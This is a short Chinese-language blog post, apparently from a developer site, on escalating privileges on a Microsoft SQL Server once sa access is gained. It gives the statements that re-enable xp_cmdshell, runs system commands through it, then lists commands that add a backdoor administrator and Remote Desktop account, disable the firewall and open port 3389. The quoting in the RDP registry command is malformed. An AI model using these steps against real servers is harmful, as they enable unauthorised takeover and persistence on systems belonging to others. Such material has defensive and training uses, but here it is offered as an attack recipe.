MSSQL数据库提权之XP_cmdshell提权
当拿到SQL Server 数据库sa权限时,可以通过xp_cmdshell进行提权操作
xp_cmdshell 默认在 mssql2000 中是开启的,在 mssql2005 之后的版本中则默认禁止。如果用户拥有管理员 sa 权限则可以用 sp_configure 重新开启它。
启用xp_cmdshell:
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
关闭xp_cmdshell:
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;
调用xp_cmdshell执行系统权限
EXEC master..xp_cmdshell 'whoami';
至此,提权完毕(可通过添加账户等拿下该服务器权限)
添加用户、加入管理员组、关闭防火墙、开启3389等命令
#添加用户
net user {username} {password} /add
#将新添加的用户加入管理员组
net localgroup Administrators {username} /add
#将新添加的用户加入远程桌面组
net localgroup “Remote Desktop Users” {username} /add
#关闭系统防火墙
netsh advfirewall set allprofiles state off/on
#开启3389
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 无需6万激活码!GitHub神秘组织3小时极速复刻Manus,手把手教你使用OpenManus搭建本
· Manus爆火,是硬核还是营销?
· 终于写完轮子一部分:tcp代理 了,记录一下
· 别再用vector<bool>了!Google高级工程师:这可能是STL最大的设计失误
· 单元测试从入门到精通